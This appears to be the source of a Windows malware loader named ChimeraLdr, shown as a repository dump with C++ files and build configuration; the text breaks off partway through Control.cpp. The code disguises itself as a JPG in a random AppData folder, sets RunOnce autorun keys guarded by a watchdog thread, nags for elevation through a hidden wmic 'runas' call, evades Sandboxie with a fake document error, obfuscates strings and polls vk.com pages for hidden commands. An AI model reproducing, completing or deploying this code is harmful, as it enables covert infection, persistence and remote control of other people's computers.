├── ChimeraLdr ├── Chimera.cpp ├── Chimera.sln ├── Chimera.vcxproj ├── Chimera.vcxproj.user ├── Control.cpp ├── Control.h ├── Debug │ ├── Chimera.Build.CppClean.log │ ├── Chimera.dll │ ├── Chimera.dll.recipe │ ├── Chimera.exp │ ├── Chimera.ilk │ ├── Chimera.lib │ ├── Chimera.log │ ├── Chimera.obj │ ├── Chimera.pdb │ ├── Chimera.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Chimera.lastbuildstate │ │ ├── Chimera.write.1u.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── Chimera.vcxproj.FileListAbsolute.txt │ ├── Control.obj │ ├── Install.obj │ ├── global.obj │ ├── memory.obj │ ├── urlsaver.obj │ ├── utils.obj │ ├── vc142.idb │ ├── vc142.pdb │ └── vcpkg.applocal.log ├── Install.cpp ├── Install.h ├── Release │ ├── Chimera.Build.CppClean.log │ ├── Chimera.exe │ ├── Chimera.exe.recipe │ ├── Chimera.exp │ ├── Chimera.iobj │ ├── Chimera.ipdb │ ├── Chimera.lib │ ├── Chimera.log │ ├── Chimera.obj │ ├── Chimera.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Chimera.lastbuildstate │ │ ├── Chimera.write.1u.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── Chimera.vcxproj.FileListAbsolute.txt │ ├── Control.obj │ ├── Install.obj │ ├── global.obj │ ├── memory.obj │ ├── urlsaver.obj │ ├── utils.obj │ ├── vc142.pdb │ └── vcpkg.applocal.log ├── global.cpp ├── global.h ├── memory.cpp ├── memory.h ├── mydbg.h ├── urlsaver.cpp ├── urlsaver.h ├── utils.cpp └── utils.h ├── LICENSE └── README.md /ChimeraLdr/Chimera.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | struct Data 4 | { 5 | WCHAR szSelf[256]; 6 | WCHAR szTemporary1[256]; 7 | WCHAR szTemporary2[256]; 8 | }; 9 | 10 | 11 | BOOL Install() 12 | { 13 | GlobalMemory MyMem(sizeof(Data) + 1); 14 | Data *lpData = (Data*)MyMem.localloc(sizeof(Data)); 15 | if (!lpData) 16 | { 17 | dbg("No memory"); 18 | return 
FALSE; 19 | } 20 | GetModuleFileNameW(0, lpData->szSelf, 256); 21 | 22 | 23 | HRESULT hRes = SHGetFolderPathW(0, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, SHGFP_TYPE_CURRENT, lpData->szTemporary1); 24 | if (hRes != S_OK) 25 | GetTempPathW(256, lpData->szTemporary1); 26 | 27 | 28 | WCHAR szRandomString[RandomDirectoryLen + 1] = { L'P', L'a', L'i', L'm', L'o', L'n', L'\0' }; 29 | 30 | if (!GenerateRandomString(szRandomString, RandomDirectoryLen)) 31 | dbg("Can not gen random string, using default Paimon"); 32 | wsprintfW(lpData->szTemporary2, L"%s\\%s", lpData->szTemporary1, szRandomString); 33 | 34 | CreateDirectoryW(lpData->szTemporary2, 0); 35 | if (GetLastError() == ERROR_ACCESS_DENIED) 36 | { 37 | dbg("Error: access denied"); 38 | return FALSE; 39 | } 40 | else 41 | { 42 | dbg(L"Created directory ", lpData->szTemporary2); 43 | } 44 | 45 | WCHAR szFileName[] = { L'C', L'h', L'i', L'm', L'e', L'r', L'a', L'.', L'j', L'p', L'g', L'\0' }; 46 | 47 | wsprintfW(lpData->szTemporary1, L"%s\\%s", lpData->szTemporary2, szFileName); 48 | 49 | if (BlockCopy(lpData->szSelf, lpData->szTemporary1)) 50 | { 51 | dbg(L"Wrote self to: ", lpData->szTemporary1); 52 | if (!CreateDllProcess(lpData->szTemporary1)) 53 | { 54 | dbg("Can not create rundll process, loading self"); 55 | HMODULE hSelfModule = LoadLibraryW(lpData->szTemporary1); 56 | 57 | if (hSelfModule) 58 | { 59 | typedef DWORD(_cdecl *lpCHIMERA)(); 60 | lpCHIMERA fnFuncKROBA = (lpCHIMERA)GetProcAddress(hSelfModule, "CHIMERA"); 61 | if (fnFuncKROBA) 62 | { 63 | fnFuncKROBA(); 64 | } 65 | } 66 | 67 | Sleep(INFINITE); 68 | } 69 | } 70 | else 71 | { 72 | dbg(L"Can not copy self to: ", lpData->szTemporary1); 73 | } 74 | 75 | return TRUE; 76 | } 77 | 78 | BOOL SetupPersistence(LPWSTR pKeyName, BOOL isHKLM, LPWSTR pSelf); 79 | 80 | 81 | BOOL HKAutorun(LPWSTR pSelf) 82 | { 83 | HKEY hKey; 84 | 85 | BOOL bRet = FALSE; 86 | 87 | WCHAR RegPath[] = 88 | { 89 | L'S', L'O', L'F', L'T', L'W', L'A', 90 | L'R', L'E', L'\\', L'M', L'i', 
L'c', 91 | L'r', L'o', L's', L'o', L'f', L't', 92 | L'\\', L'W', L'i', L'n', L'd', L'o', 93 | L'w', L's', L'\\', L'C', L'u', L'r', 94 | L'r', L'e', L'n', L't', L'V', L'e', 95 | L'r', L's', L'i', L'o', L'n', L'\\', 96 | L'R', L'u', L'n', L'O', L'n', L'c', L'e', L'\0' 97 | }; 98 | 99 | GlobalMemory MyMem(1025); 100 | LPWSTR pRunCommandLine = (LPWSTR)MyMem.localloc(1024); 101 | 102 | BOOL bHKLM = TRUE; 103 | 104 | WCHAR wsprintfString[] = 105 | { 106 | L'r', L'u', L'n', L'd', L'l', L'l', L'3', L'2', L'.', L'e', L'x', L'e', L' ', L'\"', L'%', L's', L'\"', L',', L'C', L'H', L'I', L'M', L'E', L'R', L'A', L'\0' 107 | }; 108 | 109 | wsprintfW(pRunCommandLine, wsprintfString, pSelf); 110 | 111 | dbg(L"Adding to registry: ", pSelf); 112 | 113 | DWORD ret = RegCreateKeyExW(HKEY_LOCAL_MACHINE, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 114 | 115 | if (ret != ERROR_SUCCESS) 116 | { 117 | dbg(L"HKLM error, adding to HKCU"); 118 | DWORD ret = RegCreateKeyExW(HKEY_CURRENT_USER, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 119 | bHKLM = FALSE; 120 | } 121 | else 122 | { 123 | dbg(L"Adding to HKLM"); 124 | } 125 | 126 | if (ret == ERROR_SUCCESS) 127 | { 128 | 129 | WCHAR szRandomString[RandomDirectoryLen + 1] = { L'P', L'a', L'i', L'm', L'o', L'n', L'\0' }; 130 | 131 | if (!GenerateRandomString(szRandomString, RandomDirectoryLen)) 132 | dbg("Can not gen random string, using default SuperBear"); 133 | 134 | ret = RegSetValueExW(hKey, szRandomString, 0, REG_SZ, (LPBYTE)pRunCommandLine, lstrlenW(pRunCommandLine) * 2); 135 | if (ret != ERROR_SUCCESS) 136 | { 137 | dbg("Error setting value"); 138 | } 139 | else 140 | { 141 | bRet = TRUE; 142 | 143 | SetupPersistence(szRandomString, bHKLM, pSelf); 144 | } 145 | RegCloseKey(hKey); 146 | } 147 | else 148 | { 149 | dbg("Error adding to registry"); 150 | } 151 | return bRet; 152 | } 153 | 154 | struct PersistenceInformation 155 | { 156 | WCHAR pKeyName[256]; 157 | WCHAR pSelf[256]; 158 | BOOL bHKLM; 159 | }; 160 | 161 | DWORD WINAPI 
ProtectRegistry(PersistenceInformation *lpPersistence) 162 | { 163 | #ifdef _DEBUG 164 | if (lpPersistence->bHKLM) 165 | dbg(L"[Persistence] protecting keyname in HKLM: ", lpPersistence->pKeyName); 166 | else 167 | dbg(L"[Persistence] pretecting keyname in HKCU: ", lpPersistence->pKeyName); 168 | #endif 169 | 170 | 171 | HKEY hKey; 172 | 173 | 174 | WCHAR RegPath[] = 175 | { 176 | L'S', L'O', L'F', L'T', L'W', L'A', 177 | L'R', L'E', L'\\', L'M', L'i', L'c', 178 | L'r', L'o', L's', L'o', L'f', L't', 179 | L'\\', L'W', L'i', L'n', L'd', L'o', 180 | L'w', L's', L'\\', L'C', L'u', L'r', 181 | L'r', L'e', L'n', L't', L'V', L'e', 182 | L'r', L's', L'i', L'o', L'n', L'\\', 183 | L'R', L'u', L'n', L'O', L'n', L'c', L'e', L'\0' 184 | }; 185 | 186 | DWORD ret; 187 | if (lpPersistence->bHKLM) 188 | ret = RegCreateKeyExW(HKEY_LOCAL_MACHINE, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 189 | else 190 | ret = RegCreateKeyExW(HKEY_CURRENT_USER, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 191 | 192 | if (ret == ERROR_SUCCESS) 193 | { 194 | if (RegNotifyChangeKeyValue(hKey, TRUE, REG_NOTIFY_CHANGE_LAST_SET, 0, FALSE) == ERROR_SUCCESS) 195 | { 196 | if (HKAutorun(lpPersistence->pSelf)) 197 | dbg("[Persistence] restored"); 198 | else 199 | dbg("[Persistence] can not restore value"); 200 | } 201 | RegCloseKey(hKey); 202 | } 203 | else 204 | { 205 | dbg("[Persistence] Reg create error"); 206 | } 207 | ExitThread(0); 208 | } 209 | 210 | BOOL SetupPersistence(LPWSTR pKeyName, BOOL isHKLM, LPWSTR pSelf) 211 | { 212 | PersistenceInformation *lpPersistence = (PersistenceInformation*)VirtualAlloc(0, sizeof(PersistenceInformation), MEM_COMMIT | MEM_RESERVE, 213 | PAGE_READWRITE); 214 | 215 | if (lpPersistence) 216 | { 217 | lstrcpyW(lpPersistence->pKeyName, pKeyName); 218 | lstrcpyW(lpPersistence->pSelf, pSelf); 219 | lpPersistence->bHKLM = isHKLM; 220 | HANDLE hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ProtectRegistry, (LPVOID)lpPersistence, 0, 0); 221 | if (!hThread) 222 | 
dbg("Can not create thread to protect registry"); 223 | } 224 | 225 | return FALSE; 226 | } 227 | 228 | 229 | BOOL HostProcessSvchost() 230 | { 231 | return FALSE; 232 | } 233 | 234 | BOOL SvchostAutorun() 235 | { 236 | return FALSE; 237 | } 238 | 239 | VOID AddStartup(LPWSTR pSelf) 240 | { 241 | 242 | 243 | if (HostProcessSvchost()) 244 | return; 245 | 246 | if (!SvchostAutorun()) 247 | { 248 | dbg("Error adding self to svchost"); 249 | if (!HKAutorun(pSelf)) 250 | { 251 | dbg("Error adding self to HKCU"); 252 | } 253 | else 254 | { 255 | dbg("Succeeded run in runonce"); 256 | } 257 | } 258 | } 259 | 260 | DWORD WINAPI LdrMain(PWCHAR pSelf) 261 | { 262 | AddStartup(pSelf); 263 | 264 | CreateMutexW(0, 0, L"CHIMERA-LDRA-VITMA-YAWA"); 265 | DWORD dwLastErr = GetLastError(); 266 | 267 | if ((dwLastErr == ERROR_ACCESS_DENIED) || (dwLastErr == ERROR_ALREADY_EXISTS)) 268 | { 269 | dbg("Already running"); 270 | ExitProcess(0); 271 | } 272 | 273 | #ifdef _DEBUG 274 | MessageBoxW(0, L"LdrMain", L"LdrMain", 0); 275 | #endif 276 | 277 | ControlMain(); 278 | 279 | ExitThread(0); 280 | } 281 | 282 | 283 | BOOL IsUserElevatedAdmin() 284 | { 285 | SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; 286 | PSID SecurityIdentifier; 287 | if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &SecurityIdentifier)) 288 | return 0; 289 | 290 | BOOL IsAdminMember; 291 | 292 | HMODULE ntdll = GetModuleHandleA("advapi32.dll"); 293 | typedef BOOL(__stdcall *ttCheckTokenMembership1)(HANDLE, PSID, PBOOL); 294 | ttCheckTokenMembership1 CheckTokenMembership1 = (ttCheckTokenMembership1)GetProcAddress(ntdll, "CheckTokenMembership"); 295 | 296 | if (!CheckTokenMembership1(NULL, SecurityIdentifier, &IsAdminMember)) 297 | IsAdminMember = FALSE; 298 | 299 | FreeSid(SecurityIdentifier); 300 | 301 | return IsAdminMember; 302 | } 303 | DWORD getBuildNumber() 304 | { 305 | DWORD dwVersion = 0; 306 | DWORD dwBuild = 0; 307 | 
dwVersion = GetVersion(); 308 | 309 | if (dwVersion < 0x80000000) 310 | dwBuild = (DWORD)(HIWORD(dwVersion)); 311 | return dwBuild; 312 | } 313 | void LowExit(LPWSTR lpSelf) 314 | { 315 | if (!IsUserElevatedAdmin() && getBuildNumber() > 5112) 316 | { 317 | WCHAR szCommand[512]; 318 | WCHAR szWMICPath[256]; 319 | 320 | dbg("Elevating uac"); 321 | 322 | WCHAR EnvirString[] = 323 | { 324 | L'%', L'w', L'i', L'n', L'd', L'i', L'r', 325 | L'%', L'\\', L's', L'y', L's', L't', L'e', 326 | L'm', L'3', L'2', L'\\', L'w', L'b', L'e', 327 | L'm', L'\\', L'w', L'm', L'i', L'c', L'\0', 328 | }; 329 | ExpandEnvironmentStringsW(EnvirString, szWMICPath, 255); 330 | 331 | dbg(L"WMI path: ", szWMICPath); 332 | 333 | WCHAR lpCommandLineString[] = 334 | { 335 | L'p', L'r', L'o', L'c', L'e', L's', 336 | L's', L' ', L'c', L'a', L'l', L'l', 337 | L' ', L'c', L'r', L'e', L'a', L't', 338 | L'e', L' ', L'\"', L'c', L'm', L'd', 339 | L' ', L'/', L'c', L' ', L's', L't', 340 | L'a', L'r', L't', L' ', L'%', L's', 341 | L'\"', L'\0' 342 | }; 343 | wsprintfW(szCommand, lpCommandLineString, lpSelf); 344 | 345 | dbg(L"WMI Query: ", szCommand); 346 | 347 | GlobalMemory MyMem(sizeof(SHELLEXECUTEINFO)+1); 348 | LPSHELLEXECUTEINFO shExInfo = (LPSHELLEXECUTEINFO)MyMem.localloc(sizeof(SHELLEXECUTEINFO)); 349 | 350 | if (!shExInfo) 351 | { 352 | dbg("Error: no memory in uac elevation"); 353 | } 354 | 355 | 356 | shExInfo->cbSize = sizeof(SHELLEXECUTEINFO); 357 | shExInfo->fMask = SEE_MASK_NOCLOSEPROCESS; 358 | shExInfo->hwnd = 0; 359 | WCHAR RunAsStr[] = 360 | { 361 | L'r', L'u', L'n', L'a', L's', L'\0' 362 | }; 363 | shExInfo->lpVerb = RunAsStr; 364 | shExInfo->lpFile = szWMICPath; 365 | shExInfo->lpParameters = szCommand; 366 | shExInfo->lpDirectory = 0; 367 | shExInfo->nShow = SW_HIDE; 368 | shExInfo->hInstApp = 0; 369 | 370 | DWORD ElevationTries = 0; 371 | do 372 | { 373 | if (ShellExecuteEx(shExInfo)) 374 | { 375 | WaitForSingleObject(shExInfo->hProcess, INFINITE); 376 | dbg("WMI, elevation 
succeed"); 377 | CloseHandle(shExInfo->hProcess); 378 | ExitProcess(0); 379 | } 380 | else 381 | { 382 | dbg("Elevation failed"); 383 | } 384 | ElevationTries++; 385 | } while (ElevationTries < MAX_ELEVATE_TRIES); 386 | } 387 | else 388 | { 389 | dbg("UAC elevation is not required"); 390 | } 391 | } 392 | 393 | typedef DWORD(WINAPI *fnGetModuleFileNameW)(HMODULE, PWCHAR, DWORD); 394 | 395 | VOID GetFuncModuleFileName(fnGetModuleFileNameW *lpFunc) 396 | { 397 | CHAR KernelLib[] = 398 | { 399 | 'K', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', '\0' 400 | }; 401 | 402 | CHAR szGetModuleFileNameW[] = 403 | { 404 | 'G', 'e', 't', 'M', 'o', 'd', 405 | 'u', 'l', 'e', 'F', 'i', 'l', 406 | 'e', 'N', 'a', 'm', 'e', 'W', 407 | '\0' 408 | }; 409 | 410 | *lpFunc = (fnGetModuleFileNameW)GetProcAddress(GetModuleHandleA(KernelLib), szGetModuleFileNameW); 411 | } 412 | 413 | extern "C" __declspec(dllexport) 414 | DWORD _cdecl CHIMERA() 415 | { 416 | GlobalMemory MyMem(1024); 417 | LPWSTR pSelf = (LPWSTR)MyMem.localloc(513); 418 | HMODULE SelfModule; 419 | 420 | GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCWSTR)&CHIMERA, &SelfModule); 421 | 422 | fnGetModuleFileNameW lpGetModuleFileNameW; 423 | 424 | GetFuncModuleFileName(&lpGetModuleFileNameW); 425 | 426 | if (lpGetModuleFileNameW) 427 | { 428 | lpGetModuleFileNameW(SelfModule, pSelf, 256); 429 | } 430 | 431 | 432 | LdrMain(pSelf); 433 | return 0; 434 | } 435 | 436 | VOID antiAnalysis() 437 | { 438 | WCHAR SandboxieDLL[] = 439 | { 440 | L'S', L'b', L'i', L'e', 441 | L'D', L'l', L'l', L'.', 442 | L'd', L'l', L'l', L'\0', 443 | }; 444 | 445 | if (GetModuleHandleW(SandboxieDLL)) 446 | { 447 | MessageBoxW(0, L"Error: this is not document either it is corrupted. 
Try to run out of Sandboxie", L"Sandboxie error", MB_ICONERROR); 448 | ExitProcess(0); 449 | } 450 | } 451 | 452 | DWORD _cdecl DLLMain(HINSTANCE hInstDLL, DWORD fdwReason, LPVOID lpReserved) 453 | { 454 | GetCommandLineA(); 455 | 456 | 457 | GlobalMemory MyMem(1024); 458 | LPWSTR pSelf = (LPWSTR)MyMem.localloc(513); 459 | HMODULE SelfModule; 460 | 461 | GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCWSTR)&DLLMain, &SelfModule); 462 | 463 | 464 | fnGetModuleFileNameW lpGetModuleFileNameW; 465 | 466 | GetFuncModuleFileName(&lpGetModuleFileNameW); 467 | 468 | if (lpGetModuleFileNameW) 469 | { 470 | lpGetModuleFileNameW(SelfModule, pSelf, 256); 471 | } 472 | 473 | 474 | antiAnalysis(); 475 | 476 | if (IsLibrary(SelfModule)) 477 | { 478 | switch (fdwReason) 479 | { 480 | case DLL_PROCESS_ATTACH: 481 | 482 | 483 | dbg(L"Loaded as dll ", pSelf); 484 | LdrMain(pSelf); 485 | break; 486 | case DLL_PROCESS_DETACH: 487 | dbg(L"Detached from process ", pSelf); 488 | break; 489 | } 490 | return TRUE; 491 | } 492 | else 493 | { 494 | 495 | dbg(L"Started as exe file ", pSelf); 496 | 497 | LowExit(pSelf); 498 | 499 | if (!Install()) 500 | dbg(L"Installation failed"); 501 | 502 | ExitProcess(0); 503 | } 504 | } 505 | -------------------------------------------------------------------------------- /ChimeraLdr/Chimera.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31105.61 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Chimera", "Chimera.vcxproj", "{9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | 
GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Debug|x86.ActiveCfg = Debug|Win32 15 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Debug|x86.Build.0 = Debug|Win32 16 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Release|x86.ActiveCfg = Release|Win32 17 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {136DFFC6-3C5C-4E00-BCDE-9EDF54992852} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /ChimeraLdr/Chimera.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F} 15 | Chimera 16 | 10.0 17 | 18 | 19 | 20 | DynamicLibrary 21 | true 22 | v142 23 | MultiByte 24 | 25 | 26 | Application 27 | false 28 | v142 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | Level3 46 | Disabled 47 | true 48 | 49 | 50 | true 51 | 52 | 53 | 54 | 55 | Level3 56 | MaxSpeed 57 | true 58 | true 59 | true 60 | MultiThreaded 61 | false 62 | false 63 | 64 | 65 | false 66 | true 67 | true 68 | Windows 69 | DLLMain 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /ChimeraLdr/Chimera.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ChimeraLdr/Control.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 
2 | 3 | static const unsigned char pr2six[256] = 4 | { 5 | /* ASCII table */ 6 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 7 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 8 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 9 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 10 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 11 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 12 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 13 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 14 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 15 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 16 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 17 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 18 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 19 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 20 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 21 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 22 | }; 23 | 24 | int Base64decode_len(const char *bufcoded) 25 | { 26 | int nbytesdecoded; 27 | register const unsigned char *bufin; 28 | register int nprbytes; 29 | 30 | bufin = (const unsigned char *)bufcoded; 31 | while (pr2six[*(bufin++)] <= 63); 32 | 33 | nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; 34 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 35 | 36 | return nbytesdecoded + 1; 37 | } 38 | 39 | int Base64decode(char *bufplain, const char *bufcoded) 40 | { 41 | int nbytesdecoded; 42 | register const unsigned char *bufin; 43 | register unsigned char *bufout; 44 | register int nprbytes; 45 | 46 | bufin = (const unsigned char *)bufcoded; 47 | while (pr2six[*(bufin++)] <= 63); 48 | nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; 49 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 50 | 51 | bufout = 
(unsigned char *)bufplain; 52 | bufin = (const unsigned char *)bufcoded; 53 | 54 | while (nprbytes > 4) { 55 | *(bufout++) = 56 | (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 57 | *(bufout++) = 58 | (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 59 | *(bufout++) = 60 | (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 61 | bufin += 4; 62 | nprbytes -= 4; 63 | } 64 | 65 | 66 | if (nprbytes > 1) { 67 | *(bufout++) = 68 | (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 69 | } 70 | if (nprbytes > 2) { 71 | *(bufout++) = 72 | (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 73 | } 74 | if (nprbytes > 3) { 75 | *(bufout++) = 76 | (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 77 | } 78 | 79 | *(bufout++) = '\0'; 80 | nbytesdecoded -= (4 - nprbytes) & 3; 81 | return nbytesdecoded; 82 | } 83 | 84 | HINTERNET OpenInternet(LPWSTR UserAgent) 85 | { 86 | HINTERNET hRet = InternetOpenW(UserAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 87 | 88 | if (!hRet) 89 | { 90 | hRet = InternetOpenW(UserAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC); 91 | } 92 | return hRet; 93 | } 94 | 95 | 96 | wchar_t * __cdecl mystrstr( 97 | wchar_t * str1, 98 | wchar_t * str2 99 | ) 100 | { 101 | wchar_t*cp = (wchar_t*)str1; 102 | wchar_t*s1, *s2; 103 | 104 | if (!*str2) 105 | return((wchar_t*)str1); 106 | 107 | while (*cp) 108 | { 109 | s1 = cp; 110 | s2 = (wchar_t*)str2; 111 | 112 | while (*s1 && *s2 && !(*s1 - *s2)) 113 | s1++, s2++; 114 | 115 | if (!*s2) 116 | return(cp); 117 | 118 | cp++; 119 | } 120 | 121 | return(NULL); 122 | } 123 | 124 | char * __cdecl mystrstr( 125 | char * str1, 126 | char * str2 127 | ) 128 | { 129 | char*cp = (char*)str1; 130 | char*s1, *s2; 131 | 132 | if (!*str2) 133 | return((char*)str1); 134 | 135 | while (*cp) 136 | { 137 | s1 = cp; 138 | s2 = (char*)str2; 139 | 140 | while (*s1 && *s2 && !(*s1 - *s2)) 141 | s1++, s2++; 142 | 143 | if (!*s2) 144 | 
return(cp); 145 | 146 | cp++; 147 | } 148 | 149 | return(NULL); 150 | 151 | } 152 | 153 | BOOL ParseHtml(PCHAR szHtml, DWORD dwSize, PCHAR *pOut) 154 | { 155 | 156 | PCHAR pCommand = mystrstr(szHtml, WATERMARK); 157 | if (pCommand) 158 | { 159 | pCommand += lstrlenA(WATERMARK); 160 | *pOut = pCommand; 161 | return TRUE; 162 | } 163 | return FALSE; 164 | } 165 | 166 | BOOL GetCommand(PCHAR pCommandOutput, LPWSTR pUserId) 167 | { 168 | dbg(L"Trying to get command from: ", pUserId); 169 | BOOL bRet = FALSE; 170 | HINTERNET hInternet; 171 | 172 | WCHAR szUserAgent[] = 173 | { 174 | L'M', L'o', L'z', L'i', L'l', L'l', L'a', 175 | L'/', L'5', L'.', L'0', L' ', L'(', L'W', L'i', 176 | L'n', L'd', L'o', L'w', L's', L' ', L'N', 177 | L'T', L' ', L'6', L'.', L'1', L';', L' ', 178 | L'W', L'O', L'W', L'6', L'4', L')', L' ', 179 | L'A', L'p', L'p', L'l', L'e', L'W', L'e', 180 | L'b', L'K', L'i', L't', L'/', L'5', L'3', 181 | L'7', L'.', L'3', L'6', L' ', L'(', L'K', 182 | L'H', L'T', L'M', L'L', L',', L' ', L'l', L'i', 183 | L'k', L'e', L' ', L'G', L'e', L'c', L'k', 184 | L'o', L')', L' ', L'C', L'h', L'r', L'o', 185 | L'm', L'e', L'/', L'5', L'5', L'.', L'0', 186 | L'.', L'2', L'8', L'8', L'3', L'.', L'8', 187 | L'7', L' ', L'S', L'a', L'f', L'a', L'r', 188 | L'i', L'/', L'5', L'3', L'7', L'.', L'3', 189 | L'6', L'\0' 190 | }; 191 | 192 | 193 | 194 | 195 | dbg(L"Using UserAgent: ", szUserAgent); 196 | do 197 | { 198 | hInternet = OpenInternet(szUserAgent); 199 | } while (!hInternet); 200 | 201 | HINTERNET hConnect; 202 | do 203 | { 204 | dbg(L"Connecting to vk.com"); 205 | hConnect = InternetConnectW(hInternet, L"vk.com", INTERNET_DEFAULT_HTTPS_PORT, L"", L"", INTERNET_SERVICE_HTTP, 0, 0); 206 | } while ((!hConnect) || (Sleep(10000), FALSE)); 207 | 208 | WCHAR GetSz[] = 209 | { 210 | L'G', L'E', L'T', L'\0' 211 | }; 212 | 213 | WCHAR HttpVersz[] = 214 | { 215 | L'H', L'T', L'T', L'P', L'/', L'1', L'.', L'1', '\0' 216 | }; 217 | 218 | dbg(L"Connected to vk.com"); 219 | 220 | 
